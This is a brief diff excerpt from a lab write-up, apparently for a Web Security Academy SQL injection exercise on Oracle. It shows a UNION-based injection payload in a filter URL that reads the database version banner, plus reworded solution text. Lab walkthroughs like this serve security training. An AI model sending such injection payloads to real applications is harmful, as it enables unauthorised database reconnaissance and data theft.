LakesideLich/WebSecurityAcademy/SQL Injection/Lab: SQL injection attack, querying the database type and version on Oracle.md

 /filter?category=Gifts'+UNION+SELECT+banner,NULL+FROM+v$version--
 ```

-Send this request, and solve the lab.
+Send this request, and see if you can find the version details in the application's response.
+You've solved the lab!